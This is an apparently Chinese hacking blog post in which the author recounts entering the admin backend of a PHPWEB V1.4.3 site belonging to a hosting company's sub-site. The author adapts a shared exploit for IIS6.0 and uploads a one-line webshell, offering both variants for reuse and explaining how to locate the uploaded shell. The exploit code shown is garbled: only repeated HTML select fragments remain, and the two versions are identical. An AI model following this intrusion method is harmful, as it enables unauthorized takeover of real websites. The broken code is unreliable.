php用户管理拿shell,PHPWEB网站管理系统后台拿shell

分享作者如何在遇到PHPWEB V1.4.3版本后台拿shell难题时,通过寻找EXP并针对IIS6.0环境进行调整的过程,展示了跨平台漏洞利用的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的

去百度一下 那个方法失效

版本: V1.4.3 / 20100925

无奈中 于是在刁科的群里面发了一下 问问 phpweb后台拿shell 有方法吗? 一位道友告诉贫道EXP 于是我利用了

在刁科论坛找了找看见三石发的这个EXP 于是贫道就利用 可是不行啊 他那个测试环境:PHP+MySQL+Apache+Linux

贫道这个是IIS6.0

于是贫道就把代码改了一下 上传一句话成功

阿帕奇的和IIS的我都发上来 以后看见了 拿shell好利用

IIS贫道自己改了一下

——————————————————————————————————————-

本地

< option value=”2″>远程

< /select>

对齐方式

< option value=”baseline”>baseline

< option value=”top”>top

< option value=”middle”>middle

< option value=”bottom”>bottom

< option value=”texttop”>texttop

< option value=”absmiddle”>absmiddle

< option value=”absbottom”>absbottom

< option value=”left”>left

< option value=”right”>right

< /select>

< input type=”text” name=”imgHspace” id=”imgHspace” value=”0″ maxlength=”1″ style=”width:20px;border:1px solid #555555;” />

———————————————————————————————————————————————————————-

上面是阿帕奇的

———————————————————————————————————————————————————————-

本地

< option value=”2″>远程

< /select>

对齐方式

< option value=”baseline”>baseline

< option value=”top”>top

< option value=”middle”>middle

< option value=”bottom”>bottom

< option value=”texttop”>texttop

< option value=”absmiddle”>absmiddle

< option value=”absbottom”>absbottom

< option value=”left”>left

< option value=”right”>right

< /select>

< input type=”text” name=”imgHspace” id=”imgHspace” value=”0″ maxlength=”1″ style=”width:20px;border:1px solid #555555;” />

———————————————————————————————————————————————————————–

这个是IIS6.0的 上传的一句话 (*^__^*) 嘻嘻…… 你懂的 改了一下名称!

上传以后只需要右键查看源代码即可得到上传后的地址

第一行的action改名为真是的kedit地址

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值